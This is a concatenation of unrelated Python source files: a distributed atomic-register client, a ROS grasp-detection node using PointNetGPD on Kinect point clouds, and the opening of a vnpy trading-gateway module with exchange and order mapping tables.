# Send IP, socket to client UDP RX
# Send info interval to client UDP RX
return
def main():
# Figure out what interface to use - from the user
client_list = []
client_list_lock = threading.RLock()
end_event = threading.Event()
d_thread = threading.Thread(target=discovery_thread, args=(client_list_lock,client_list,end_event))
d_thread.start()
raw_input('Press Enter to quit')
end_event.set()
with client_list_lock:
for client in client_list:
client.end()
if __name__ == "__main__":
debug=False
nt.interface = 'eth0'
main()
|
ARclient.py
|
#!/bin/python3.6
# -*- coding: utf-8 -*-
#
# MIT License
#
# Copyright (c) 2018 Robert Gustafsson
# Copyright (c) 2018 Andreas Lindhé
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import configparser
import time
import threading
import math
import struct
import random as r
from threading import Thread
from channel.SenderChannel import SenderChannel
from atomic_register.QuorumSendAR import QuorumSend
from channel.ppProtocol import PingPongMessage
class Client:
def __init__(self, cfgfile):
self.hw_addr = self.get_hwaddr()
self.uid = (-1, self.hw_addr)
self.loop = asyncio.get_event_loop()
config = configparser.ConfigParser()
config.read(cfgfile)
nbr_of_servers = int(config['General']['n'])
self.majority = math.ceil((nbr_of_servers+1)/2)
quorum_size = self.majority
self.p = QuorumSend(quorum_size, PingPongMessage)
t = Thread(target=self.start_event_loop, args=(self.loop, config['Nodes']))
t.daemon = True
t.start()
def get_hwaddr(self):
with open('/sys/class/net/lo/address') as f:
hw_addr = f.read().splitlines()[0]
if (hw_addr == '00:00:00:00:00:00'):
hw_addr = ':'.join(['%02x']*6) % (
r.randint(0, 255),
r.randint(0, 255),
r.randint(0, 255),
r.randint(0, 255),
r.randint(0, 255),
r.randint(0, 255)
)
return hw_addr
def start_event_loop(self, loop, nodes):
asyncio.set_event_loop(loop)
i = 0
for node in nodes:
ip, port = nodes[node].split(':')
c = SenderChannel(i, self.hw_addr, 0, self.p, ip, port)
asyncio.ensure_future(c.start())
print("Create channel to {}:{}".format(ip, port))
i = i+1
loop.run_forever()
def qrmAccess(self, msg, opt_size=None):
fut = asyncio.run_coroutine_threadsafe(self.p.phaseInit(msg, opt_size), self.loop)
return fut.result()
def write(self, msg):
res = self.qrmAccess((None, None, 'qry', 'write'))
try:
max_tag = max([x.get_tag() for x in res])
except Exception as e:
print(res)
new_int = int(max_tag[0])+1
new_tag = (new_int, self.uid)
self.qrmAccess((new_tag, msg, 'write', 'write'))
def read(self):
res = self.qrmAccess((None, None, 'qry', 'read'))
max_tag = max([x.get_tag() for x in res])
max_rec = [x for x in res if x.get_tag() == max_tag][0]
self.qrmAccess((max_tag, max_rec.get_data(), 'inform', 'read'))
return max_rec.get_data()
|
kinect2grasp.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author : Hongzhuo Liang
# E-mail : liang@informatik.uni-hamburg.de
# Description:
# Date : 05/08/2018 6:04 PM
# File Name : kinect2grasp.py
import torch
import rospy
from sensor_msgs.msg import PointCloud2
from visualization_msgs.msg import MarkerArray
from visualization_msgs.msg import Marker
import tf
import moveit_commander
import numpy as np
import pointclouds
import voxelgrid
import pcl
from autolab_core import YamlConfig
from dexnet.grasping import RobotGripper
from dexnet.grasping import GpgGraspSamplerPcl
import os
from pyquaternion import Quaternion
import sys
from os import path
import time
from scipy.stats import mode
import multiprocessing as mp
try:
from gpd_grasp_msgs.msg import GraspConfig
from gpd_grasp_msgs.msg import GraspConfigList
except ImportError:
print("Please install grasp msgs from https://github.com/TAMS-Group/gpd_grasp_msgs in your ROS workspace")
exit()
try:
from mayavi import mlab
except ImportError:
print("Can not import mayavi")
mlab = None
sys.path.append(path.dirname(path.dirname(path.dirname(path.abspath("__file__")))))
sys.path.append(os.environ['HOME'] + "/code/PointNetGPD/PointNetGPD")
from main_test import test_network, model, args
import logging
logging.getLogger().setLevel(logging.FATAL)
# global config:
yaml_config = YamlConfig(os.environ['HOME'] + "/code/PointNetGPD/dex-net/test/config.yaml")
gripper_name = 'robotiq_85'
gripper = RobotGripper.load(gripper_name, os.environ['HOME'] + "/code/PointNetGPD/dex-net/data/grippers")
ags = GpgGraspSamplerPcl(gripper, yaml_config)
value_fc = 0.4 # no use, set a random number
num_grasps = 40
num_workers = 20
max_num_samples = 150
n_voxel = 500
minimal_points_send_to_point_net = 20
marker_life_time = 8
show_bad_grasp = False
save_grasp_related_file = False
show_final_grasp = args.show_final_grasp
tray_grasp = args.tray_grasp
using_mp = args.using_mp
single_obj_testing = False # if True, it will wait for input before get pointcloud
# number of points put into neural network
if args.model_type == "100": # minimal points send for training
input_points_num = 500
elif args.model_type == "50":
input_points_num = 750
elif args.model_type == "3class":
input_points_num = 500
else:
input_points_num = 0
def remove_table_points(points_voxel_, vis=False):
xy_unique = np.unique(points_voxel_[:, 0:2], axis=0)
new_points_voxel_ = points_voxel_
pre_del = np.zeros([1])
for i in range(len(xy_unique)):
tmp = []
for j in range(len(points_voxel_)):
if np.array_equal(points_voxel_[j, 0:2], xy_unique[i]):
tmp.append(j)
print(len(tmp))
if len(tmp) < 3:
tmp = np.array(tmp)
pre_del = np.hstack([pre_del, tmp])
if len(pre_del) != 1:
pre_del = pre_del[1:]
new_points_voxel_ = np.delete(points_voxel_, pre_del, 0)
print("Success delete [[ {} ]] points from the table!".format(len(points_voxel_) - len(new_points_voxel_)))
if vis:
p = points_voxel_
mlab.points3d(p[:, 0], p[:, 1], p[:, 2], scale_factor=0.002, color=(1, 0, 0))
p = new_points_voxel_
mlab.points3d(p[:, 0], p[:, 1], p[:, 2], scale_factor=0.002, color=(0, 0, 1))
mlab.points3d(0, 0, 0, scale_factor=0.01, color=(0, 1, 0)) # plot 0 point
mlab.show()
return new_points_voxel_
def remove_white_pixel(msg, points_, vis=False):
points_with_c_ = pointclouds.pointcloud2_to_array(msg)
points_with_c_ = pointclouds.split_rgb_field(points_with_c_)
r = np.asarray(points_with_c_['r'], dtype=np.uint32)
g = np.asarray(points_with_c_['g'], dtype=np.uint32)
b = np.asarray(points_with_c_['b'], dtype=np.uint32)
rgb_colors = np.vstack([r, g, b]).T
# rgb = rgb_colors.astype(np.float) / 255
ind_good_points_ = np.sum(rgb_colors[:] < 210, axis=-1) == 3
ind_good_points_ = np.where(ind_good_points_ == 1)[0]
new_points_ = points_[ind_good_points_]
if vis:
p = points_
mlab.points3d(p[:, 0], p[:, 1], p[:, 2], scale_factor=0.002, color=(1, 0, 0))
p = new_points_
mlab.points3d(p[:, 0], p[:, 1], p[:, 2], scale_factor=0.002, color=(0, 0, 1))
mlab.points3d(0, 0, 0, scale_factor=0.01, color=(0, 1, 0)) # plot 0 point
mlab.show()
return new_points_
def get_voxel_fun(points_, n):
get_voxel = voxelgrid.VoxelGrid(points_, n_x=n, n_y=n, n_z=n)
get_voxel.compute()
points_voxel_ = get_voxel.voxel_centers[get_voxel.voxel_n]
points_voxel_ = np.unique(points_voxel_, axis=0)
return points_voxel_
def cal_grasp(msg, cam_pos_):
points_ = pointclouds.pointcloud2_to_xyz_array(msg)
points_ = points_.astype(np.float32)
remove_white = False
if remove_white:
points_ = remove_white_pixel(msg, points_, vis=True)
# begin voxel points
n = n_voxel # parameter related to voxel method
# gpg improvements, highlights: flexible n parameter for voxelizing.
points_voxel_ = get_voxel_fun(points_, n)
if len(points_) < 2000: # should be a parameter
while len(points_voxel_) < len(points_)-15:
points_voxel_ = get_voxel_fun(points_, n)
n = n + 100
rospy.loginfo("the voxel has {} points, we want get {} points".format(len(points_voxel_), len(points_)))
rospy.loginfo("the voxel has {} points, we want get {} points".format(len(points_voxel_), len(points_)))
points_ = points_voxel_
remove_points = False
if remove_points:
points_ = remove_table_points(points_, vis=True)
point_cloud = pcl.PointCloud(points_)
norm = point_cloud.make_NormalEstimation()
norm.set_KSearch(30) # critical parameter when calculating the norms
normals = norm.compute()
surface_normal = normals.to_array()
surface_normal = surface_normal[:, 0:3]
vector_p2cam = cam_pos_ - points_
vector_p2cam = vector_p2cam / np.linalg.norm(vector_p2cam, axis=1).reshape(-1, 1)
tmp = np.dot(vector_p2cam, surface_normal.T).diagonal()
angel = np.arccos(np.clip(tmp, -1.0, 1.0))
wrong_dir_norm = np.where(angel > np.pi * 0.5)[0]
tmp = np.ones([len(angel), 3])
tmp[wrong_dir_norm, :] = -1
surface_normal = surface_normal * tmp
select_point_above_table = 0.010
# modify of gpg: make it as a parameter. avoid select points near the table.
points_for_sample = points_[np.where(points_[:, 2] > select_point_above_table)[0]]
if len(points_for_sample) == 0:
rospy.loginfo("Can not seltect point, maybe the point cloud is too low?")
return [], points_, surface_normal
yaml_config['metrics']['robust_ferrari_canny']['friction_coef'] = value_fc
if not using_mp:
rospy.loginfo("Begin cal grasps using single thread, slow!")
grasps_together_ = ags.sample_grasps(point_cloud, points_for_sample, surface_normal, num_grasps,
max_num_samples=max_num_samples, show_final_grasp=show_final_grasp)
else:
# begin parallel grasp:
rospy.loginfo("Begin cal grasps using parallel!")
def grasp_task(num_grasps_, ags_, queue_):
ret = ags_.sample_grasps(point_cloud, points_for_sample, surface_normal, num_grasps_,
max_num_samples=max_num_samples, show_final_grasp=show_final_grasp)
queue_.put(ret)
queue = mp.Queue()
num_grasps_p_worker = int(num_grasps/num_workers)
workers = [mp.Process(target=grasp_task, args=(num_grasps_p_worker, ags, queue)) for _ in range(num_workers)]
[i.start() for i in workers]
grasps_together_ = []
for i in range(num_workers):
grasps_together_ = grasps_together_ + queue.get()
rospy.loginfo("Finish mp processing!")
rospy.loginfo("Grasp sampler finish, generated {} grasps.".format(len(grasps_together_)))
return grasps_together_, points_, surface_normal
def check_collision_square(grasp_bottom_center, approach_normal, binormal,
minor_pc, points_, p, way="p_open"):
approach_normal = approach_normal.reshape(1, 3)
approach_normal = approach_normal / np.linalg.norm(approach_normal)
binormal = binormal.reshape(1, 3)
binormal = binormal / np.linalg.norm(binormal)
minor_pc = minor_pc.reshape(1, 3)
minor_pc = minor_pc / np.linalg.norm(minor_pc)
matrix_ = np.hstack([approach_normal.T, binormal.T, minor_pc.T])
grasp_matrix = matrix_.T
points_ = points_ - grasp_bottom_center.reshape(1, 3)
tmp = np.dot(grasp_matrix, points_.T)
points_g = tmp.T
use_dataset_py = True
if not use_dataset_py:
if way == "p_open":
s1, s2, s4, s8 = p[1], p[2], p[4], p[8]
elif way == "p_left":
s1, s2, s4, s8 = p[9], p[1], p[10], p[12]
elif way == "p_right":
s1, s2, s4, s8 = p[2], p[13], p[3], p[7]
elif way == "p_bottom":
s1, s2, s4, s8 = p[11], p[15], p[12], p[20]
else:
raise ValueError('No way!')
a1 = s1[1] < points_g[:, 1]
a2 = s2[1] > points_g[:, 1]
a3 = s1[2] > points_g[:, 2]
a4 = s4[2] < points_g[:, 2]
a5 = s4[0] > points_g[:, 0]
a6 = s8[0] < points_g[:, 0]
a = np.vstack([a1, a2, a3, a4, a5, a6])
points_in_area = np.where(np.sum(a, axis=0) == len(a))[0]
if len(points_in_area) == 0:
has_p = False
else:
has_p = True
# for the way of pointGPD/dataset.py:
else:
width = ags.gripper.hand_outer_diameter - 2 * ags.gripper.finger_width
x_limit = ags.gripper.hand_depth
z_limit = width / 4
y_limit = width / 2
x1 = points_g[:, 0] > 0
x2 = points_g[:, 0] < x_limit
y1 = points_g[:, 1] > -y_limit
y2 = points_g[:, 1] < y_limit
z1 = points_g[:, 2] > -z_limit
z2 = points_g[:, 2] < z_limit
a = np.vstack([x1, x2, y1, y2, z1, z2])
points_in_area = np.where(np.sum(a, axis=0) == len(a))[0]
if len(points_in_area) == 0:
has_p = False
else:
has_p = True
vis = False
if vis:
p = points_g
mlab.points3d(p[:, 0], p[:, 1], p[:, 2], scale_factor=0.002, color=(0, 0, 1))
p = points_g[points_in_area]
mlab.points3d(p[:, 0], p[:, 1], p[:, 2], scale_factor=0.002, color=(1, 0, 0))
p = ags.get_hand_points(np.array([0, 0, 0]), np.array([1, 0, 0]), np.array([0, 1, 0]))
mlab.points3d(p[:, 0], p[:, 1], p[:, 2], scale_factor=0.005, color=(0, 1, 0))
mlab.show()
return has_p, points_in_area, points_g
def collect_pc(grasp_, pc):
"""
grasp_bottom_center, normal, major_pc, minor_pc
"""
grasp_num = len(grasp_)
grasp_ = np.array(grasp_)
grasp_ = grasp_.reshape(-1, 5, 3) # prevent to have grasp that only have number 1
grasp_bottom_center = grasp_[:, 0]
approach_normal = grasp_[:, 1]
binormal = grasp_[:, 2]
minor_pc = grasp_[:, 3]
in_ind_ = []
in_ind_points_ = []
p = ags.get_hand_points(np.array([0, 0, 0]), np.array([1, 0, 0]), np.array([0, 1, 0]))
for i_ in range(grasp_num):
has_p, in_ind_tmp, points_g = check_collision_square(grasp_bottom_center[i_], approach_normal[i_],
binormal[i_], minor_pc[i_], pc, p)
in_ind_.append(in_ind_tmp)
in_ind_points_.append(points_g[in_ind_[i_]])
return in_ind_, in_ind_points_
def show_marker(marker_array_, pos_, ori_, scale_, color_, lifetime_):
marker_ = Marker()
marker_.header.frame_id = "/table_top"
# marker_.header.stamp = rospy.Time.now()
marker_.type = marker_.CUBE
marker_.action = marker_.ADD
marker_.pose.position.x = pos_[0]
marker_.pose.position.y = pos_[1]
marker_.pose.position.z = pos_[2]
marker_.pose.orientation.x = ori_[1]
marker_.pose.orientation.y = ori_[2]
marker_.pose.orientation.z = ori_[3]
marker_.pose.orientation.w = ori_[0]
marker_.lifetime = rospy.Duration.from_sec(lifetime_)
marker_.scale.x = scale_[0]
marker_.scale.y = scale_[1]
marker_.scale.z = scale_[2]
marker_.color.a = 0.5
red_, green_, blue_ = color_
marker_.color.r = red_
marker_.color.g = green_
marker_.color.b = blue_
marker_array_.markers.append(marker_)
def show_grasp_marker(marker_array_, real_grasp_, gripper_, color_, lifetime_):
"""
show grasp using marker
:param marker_array_: marker array
:param real_grasp_: [0] position, [1] approach [2] binormal [3] minor pc
:param gripper_: gripper parameter of a grasp
:param color_: color of the gripper
:param lifetime_: time for showing the maker
:return: return add makers to the maker array
"""
hh = gripper_.hand_height
fw = gripper_.real_finger_width
hod = gripper_.hand_outer_diameter
hd = gripper_.real_hand_depth
open_w = hod - fw * 2
approach = real_grasp_[1]
binormal = real_grasp_[2]
minor_pc = real_grasp_[3]
grasp_bottom_center = real_grasp_[4] - approach * (gripper_.real_hand_depth - gripper_.hand_depth)
rotation = np.vstack([approach, binormal, minor_pc]).T
qua = Quaternion(matrix=rotation)
marker_bottom_pos = grasp_bottom_center - approach * hh * 0.5
marker_left_pos = grasp_bottom_center - binormal * (open_w * 0.5 + fw * 0.5) + hd * 0.5 * approach
marker_right_pos = grasp_bottom_center + binormal * (open_w * 0.5 + fw * 0.5) + hd * 0.5 * approach
show_marker(marker_array_, marker_bottom_pos, qua, np.array([hh, hod, hh]), color_, lifetime_)
show_marker(marker_array_, marker_left_pos, qua, np.array([hd, fw, hh]), color_, lifetime_)
show_marker(marker_array_, marker_right_pos, qua, np.array([hd, fw, hh]), color_, lifetime_)
def check_hand_points_fun(real_grasp_):
ind_points_num = []
for i in range(len(real_grasp_)):
grasp_bottom_center = real_grasp_[i][4]
approach_normal = real_grasp_[i][1]
binormal = real_grasp_[i][2]
minor_pc = real_grasp_[i][3]
local_hand_points = ags.get_hand_points(np.array([0, 0, 0]), np.array([1, 0, 0]), np.array([0, 1, 0]))
has_points_tmp, ind_points_tmp = ags.check_collision_square(grasp_bottom_center, approach_normal,
binormal, minor_pc, points,
local_hand_points, "p_open")
ind_points_num.append(len(ind_points_tmp))
print(ind_points_num)
file_name = "./generated_grasps/real_points/" + str(np.random.randint(300)) + str(len(real_grasp_)) + ".npy"
np.save(file_name, np.array(ind_points_num))
def get_grasp_msg(real_good_grasp_, score_value_):
grasp_bottom_center_modify = real_good_grasp_[4]
approach = real_good_grasp_[1]
binormal = real_good_grasp_[2]
minor_pc = real_good_grasp_[3]
grasp_config_ = GraspConfig()
top_p_ = grasp_bottom_center_modify + approach * ags.gripper.hand_depth
grasp_config_.sample.x = grasp_bottom_center_modify[0]
grasp_config_.sample.y = grasp_bottom_center_modify[1]
grasp_config_.sample.z = grasp_bottom_center_modify[2]
grasp_config_.top.x = top_p_[0]
grasp_config_.top.y = top_p_[1]
grasp_config_.top.z = top_p_[2]
grasp_config_.approach.x = approach[0]
grasp_config_.approach.y = approach[1]
grasp_config_.approach.z = approach[2]
grasp_config_.binormal.x = binormal[0]
grasp_config_.binormal.y = binormal[1]
grasp_config_.binormal.z = binormal[2]
grasp_config_.axis.x = minor_pc[0]
grasp_config_.axis.y = minor_pc[1]
grasp_config_.axis.z = minor_pc[2]
grasp_config_.score.data = score_value_
return grasp_config_
def remove_grasp_outside_tray(grasps_, points_):
x_min = points_[:, 0].min()
x_max = points_[:, 0].max()
y_min = points_[:, 1].min()
y_max = points_[:, 1].max()
valid_grasp_ind_ = []
for i in range(len(grasps_)):
grasp_bottom_center = grasps_[i][4]
approach_normal = grasps_[i][1]
major_pc = grasps_[i][2]
hand_points_ = ags.get_hand_points(grasp_bottom_center, approach_normal, major_pc)
finger_points_ = hand_points_[[1, 2, 3, 4, 9, 10, 13, 14], :]
# aa = points_[:, :2] - finger_points_[0][:2] # todo: work of remove outside grasp not finished.
# from IPython import embed;embed()
a = finger_points_[:, 0] < x_min
b = finger_points_[:, 0] > x_max
c = finger_points_[:, 1] < y_min
d = finger_points_[:, 1] > y_max
if np.sum(a) + np.sum(b) + np.sum(c) + np.sum(d) == 0:
valid_grasp_ind_.append(i)
grasps_inside_ = [grasps_[i] for i in valid_grasp_ind_]
rospy.loginfo("gpg got {} grasps, after remove grasp outside tray, {} grasps left".format(len(grasps_),
len(grasps_inside_)))
return grasps_inside_
if __name__ == '__main__':
"""
definition of gotten grasps:
grasp_bottom_center = grasp_[0]
approach_normal = grasp_[1]
binormal = grasp_[2]
"""
rospy.init_node('grasp_tf_broadcaster', anonymous=True)
pub1 = rospy.Publisher('gripper_vis', MarkerArray, queue_size=1)
pub2 = rospy.Publisher('/detect_grasps/clustered_grasps', GraspConfigList, queue_size=1)
rate = rospy.Rate(10)
rospy.set_param("/robot_at_home", "true") # only use when in simulation test.
rospy.loginfo("getting transform from kinect2 to table top")
cam_pos = []
listener = tf.TransformListener()
get_transform = False
while not get_transform:
try:
cam_pos, _ = listener.lookupTransform('/table_top', '/kinect2_ir_optical_frame', rospy.Time(0))
get_transform = True
rospy.loginfo("got transform complete")
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
continue
while not rospy.is_shutdown():
if rospy.get_param("/robot_at_home") == "false":
robot_at_home = False
else:
robot_at_home = True
if not robot_at_home:
rospy.loginfo("Robot is moving, waiting the robot go home.")
continue
else:
rospy.loginfo("Robot is at home, safely catching point cloud data.")
if single_obj_testing:
input("Pleas put object on table and press any number to continue!")
rospy.loginfo("rospy is waiting for message: /table_top_points")
kinect_data = rospy.wait_for_message("/table_top_points", PointCloud2)
real_good_grasp = []
real_bad_grasp = []
real_score_value = []
repeat = 1 # speed up this try 10 time is too time consuming
# begin of grasp detection
# if there is no point cloud on table, waiting for point cloud.
if kinect_data.data == '':
rospy.loginfo("There is no points on the table, waiting...")
continue
real_grasp, points, normals_cal = cal_grasp(kinect_data, cam_pos)
if tray_grasp:
real_grasp = remove_grasp_outside_tray(real_grasp, points)
check_grasp_points_num = True # evaluate the number of points in a grasp
check_hand_points_fun(real_grasp) if check_grasp_points_num else 0
in_ind, in_ind_points = collect_pc(real_grasp, points)
if save_grasp_related_file:
np.save("./generated_grasps/points.npy", points)
np.save("./generated_grasps/in_ind.npy", in_ind)
np.save("./generated_grasps/real_grasp.npy", real_grasp)
np.save("./generated_grasps/cal_norm.npy", normals_cal)
score = [] # should be 0 or 1
score_value = [] # should be float [0, 1]
ind_good_grasp = []
ind_bad_grasp = []
rospy.loginfo("Begin send grasp into pointnet, cal grasp score")
for ii in range(len(in_ind_points)):
if rospy.get_param("/robot_at_home") == "false":
robot_at_home = False
else:
robot_at_home = True
if not robot_at_home:
rospy.loginfo("robot is not at home, stop calculating the grasp score")
break
if in_ind_points[ii].shape[0] < minimal_points_send_to_point_net:
rospy.loginfo("Mark as bad grasp! Only {} points, should be at least {} points.".format(
in_ind_points[ii].shape[0], minimal_points_send_to_point_net))
score.append(0)
score_value.append(0.0)
if show_bad_grasp:
ind_bad_grasp.append(ii)
else:
predict = []
grasp_score = []
for _ in range(repeat):
if len(in_ind_points[ii]) >= input_points_num:
points_modify = in_ind_points[ii][np.random.choice(len(in_ind_points[ii]),
input_points_num, replace=False)]
else:
points_modify = in_ind_points[ii][np.random.choice(len(in_ind_points[ii]),
input_points_num, replace=True)]
if_good_grasp, grasp_score_tmp = test_network(model.eval(), points_modify)
predict.append(if_good_grasp.item())
grasp_score.append(grasp_score_tmp)
predict_vote = mode(predict)[0][0] # vote from all the "repeat" results.
grasp_score = np.array(grasp_score)
if args.model_type == "3class": # the best in 3 class classification is the last column, third column
which_one_is_best = 2 # should set as 2
else: # for two class classification best is the second column (also the last column)
which_one_is_best = 1 # should set as 1
score_vote = np.mean(grasp_score[np.where(predict == predict_vote)][:, 0, which_one_is_best])
score.append(predict_vote)
score_value.append(score_vote)
if score[ii] == which_one_is_best:
ind_good_grasp.append(ii)
else:
if show_bad_grasp:
ind_bad_grasp.append(ii)
print("Got {} good grasps, and {} bad grasps".format(len(ind_good_grasp),
len(in_ind_points) - len(ind_good_grasp)))
if len(ind_good_grasp) != 0:
real_good_grasp = [real_grasp[i] for i in ind_good_grasp]
real_score_value = [score_value[i] for i in ind_good_grasp]
if show_bad_grasp:
real_bad_grasp = [real_grasp[i] for i in ind_bad_grasp]
# end of grasp detection
# get sorted ind by the score values
sorted_value_ind = list(index for index, item in sorted(enumerate(real_score_value),
key=lambda item: item[1],
reverse=True))
# sort grasps using the ind
sorted_real_good_grasp = [real_good_grasp[i] for i in sorted_value_ind]
real_good_grasp = sorted_real_good_grasp
# get the sorted score value, from high to low
real_score_value = sorted(real_score_value, reverse=True)
marker_array = MarkerArray()
marker_array_single = MarkerArray()
grasp_msg_list = GraspConfigList()
for i in range(len(real_good_grasp)):
grasp_msg = get_grasp_msg(real_good_grasp[i], real_score_value[i])
grasp_msg_list.grasps.append(grasp_msg)
for i in range(len(real_good_grasp)):
show_grasp_marker(marker_array, real_good_grasp[i], gripper, (0, 1, 0), marker_life_time)
if show_bad_grasp:
for i in range(len(real_bad_grasp)):
show_grasp_marker(marker_array, real_bad_grasp[i], gripper, (1, 0, 0), marker_life_time)
id_ = 0
for m in marker_array.markers:
m.id = id_
id_ += 1
grasp_msg_list.header.stamp = rospy.Time.now()
grasp_msg_list.header.frame_id = "/table_top"
# from IPython import embed;embed()
if len(real_good_grasp) != 0:
i = 0
single_grasp_list_pub = GraspConfigList()
single_grasp_list_pub.header.stamp = rospy.Time.now()
single_grasp_list_pub.header.frame_id = "/table_top"
grasp_msg = get_grasp_msg(real_good_grasp[i], real_score_value[i])
single_grasp_list_pub.grasps.append(grasp_msg)
show_grasp_marker(marker_array_single, real_good_grasp[i], gripper, (1, 0, 0), marker_life_time+20)
for m in marker_array_single.markers:
m.id = id_
id_ += 1
pub1.publish(marker_array)
rospy.sleep(4)
pub2.publish(single_grasp_list_pub)
pub1.publish(marker_array_single)
# pub2.publish(grasp_msg_list)
rospy.loginfo(" Publishing grasp pose to rviz using marker array and good grasp pose")
rate.sleep()
|
oes_td.py
|
import time
from copy import copy
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from gettext import gettext as _
from threading import Lock, Thread
# noinspection PyUnresolvedReferences
from typing import Any, Callable, Dict
from vnpy.api.oes.vnoes import OesApiClientEnvT, OesApiSubscribeInfoT, OesApi_DestoryAll, \
OesApi_InitLogger, OesApi_InitOrdChannel2, OesApi_InitQryChannel2, OesApi_InitRptChannel2, \
OesApi_LogoutAll, OesApi_QueryCashAsset, \
OesApi_QueryOptHolding, OesApi_QueryOption, OesApi_QueryOrder, OesApi_QueryStkHolding, \
OesApi_QueryStock, OesApi_SendOrderCancelReq, OesApi_SendOrderReq, OesApi_SetCustomizedDriverId, \
OesApi_SetThreadPassword, OesApi_SetThreadUsername, OesApi_WaitReportMsg, OesOrdCancelReqT, \
OesOrdCnfmT, OesOrdRejectT, OesOrdReqT, OesQryCashAssetFilterT, OesQryCursorT, \
OesQryOptionFilterT, OesQryOrdFilterT, OesQryStkHoldingFilterT, OesQryStockFilterT, \
OesRspMsgBodyT, OesStockBaseInfoT, OesTrdCnfmT, SGeneralClientChannelT, SMSG_PROTO_BINARY, \
SMsgHeadT, cast, eOesBuySellTypeT, eOesMarketIdT, eOesMsgTypeT, \
eOesOrdStatusT, eOesOrdTypeShT, eOesOrdTypeSzT, eOesSubscribeReportTypeT, \
OesApi_SetCustomizedIpAndMac
from vnpy.gateway.oes.error_code import error_to_str
from vnpy.gateway.oes.utils import create_remote_config, is_disconnected
from vnpy.trader.constant import Direction, Exchange, Offset, OrderType, Product, Status
from vnpy.trader.gateway import BaseGateway
from vnpy.trader.object import AccountData, CancelRequest, ContractData, OrderData, OrderRequest, \
PositionData, TradeData
EXCHANGE_OES2VT = {
eOesMarketIdT.OES_MKT_SH_ASHARE: Exchange.SSE,
eOesMarketIdT.OES_MKT_SZ_ASHARE: Exchange.SZSE,
eOesMarketIdT.OES_MKT_SH_OPTION: Exchange.SHFE,
}
EXCHANGE_VT2OES = {v: k for k, v in EXCHANGE_OES2VT.items()}
PRODUCT_OES2VT = {
eOesMarketIdT.OES_MKT_SH_ASHARE: Product.EQUITY,
eOesMarketIdT.OES_MKT_SZ_ASHARE: Product.EQUITY,
eOesMarketIdT.OES_MKT_SH_OPTION: Product.FUTURES,
}
# only limit price can match, all other price types are not perfectly match.
ORDER_TYPE_VT2OES = {
(Exchange.SSE, OrderType.LIMIT): eOesOrdTypeShT.OES_ORD_TYPE_SH_LMT,
(Exchange.SZSE, OrderType.LIMIT): eOesOrdTypeSzT.OES_ORD_TYPE_SZ_LMT,
}
ORDER_TYPE_OES2VT = {
(eOesMarketIdT.OES_MKT_SH_ASHARE, eOesOrdTypeShT.OES_ORD_TYPE_SH_LMT): OrderType.LIMIT,
(eOesMarketIdT.OES_MKT_SZ_ASHARE, eOesOrdTypeSzT.OES_ORD_TYPE_SZ_LMT): OrderType.LIMIT,
}
BUY_SELL_TYPE_VT2OES = {
(Exchange.SSE, Offset.OPEN, Direction.LONG): eOesBuySellTypeT.OES_BS_TYPE_BUY,
(Exchange.SSE, Offset.OPEN, Direction.SHORT): eOesBuySellTypeT.OES_BS_TYPE_SELL,
(Exchange.SSE, Offset.OPEN, Direction.NET): eOesBuySellTypeT.OES_BS_TYPE_BUY,
(Exchange.SSE, Offset.CLOSE, Direction.LONG): eOesBuySellTypeT.OES_BS_TYPE_SELL,
(Exchange.SSE, Offset.CLOSE, Direction.SHORT): eOesBuySellTypeT.OES_BS_TYPE_BUY,
(Exchange.SSE, Offset.CLOSE, Direction.NET): eOesBuySellTypeT.OES_BS_TYPE_SELL,
(Exchange.SZSE, Offset.OPEN, Direction.LONG): eOesBuySellTypeT.OES_BS_TYPE_BUY,
(Exchange.SZSE, Offset.OPEN, Direction.SHORT): eOesBuySellTypeT.OES_BS_TYPE_SELL,
(Exchange.SZSE, Offset.OPEN, Direction.NET): eOesBuySellTypeT.OES_BS_TYPE_BUY,
(Exchange.SZSE, Offset.CLOSE, Direction.LONG): eOesBuySellTypeT.OES_BS_TYPE_SELL,
(Exchange.SZSE, Offset.CLOSE, Direction.SHORT): eOesBuySellTypeT.OES_BS_TYPE_BUY,
(Exchange.SZSE, Offset.CLOSE, Direction.NET): eOesBuySellTypeT.OES_BS_TYPE_SELL,
(Exchange.SHFE, Offset.OPEN, Direction.LONG): eOesBuySellTypeT.OES_BS_TYPE_BUY_OPEN,
(Exchange.SHFE, Offset.OPEN, Direction.SHORT): eOesBuySellTypeT.OES_BS_TYPE_SELL_OPEN,
(Exchange.SHFE, Offset.OPEN, Direction.NET): eOesBuySellTypeT.OES_BS_TYPE_BUY_OPEN,
(Exchange.SHFE, Offset.CLOSE, Direction.LONG): eOesBuySellTypeT.OES_BS_TYPE_BUY_CLOSE,
(Exchange.SHFE, Offset.CLOSE, Direction.SHORT): eOesBuySellTypeT.OES_BS_TYPE_SELL_CLOSE,
(Exchange.SHFE, Offset.CLOSE, Direction.NET): eOesBuySellTypeT.OES_BS_TYPE_BUY_CLOSE,
}
STATUS_OES2VT = {
eOesOrdStatusT.OES_ORD_STATUS_NEW: Status.NOTTRADED,
eOesOrdStatusT.OES_ORD_STATUS_DECLARED: Status.NOTTRADED,
eOesOrdStatusT.OES_ORD_STATUS_PARTIALLY_FILLED: Status.PARTTRADED,
eOesOrdStatusT.OES_ORD_STATUS_FILLED: Status.ALLTRADED,
eOesOrdStatusT.OES_ORD_STATUS_CANCEL_DONE: Status.CANCELLED,
eOesOrdStatusT.OES_ORD_STATUS_PARTIALLY_CANCELED: Status.CANCELLED,
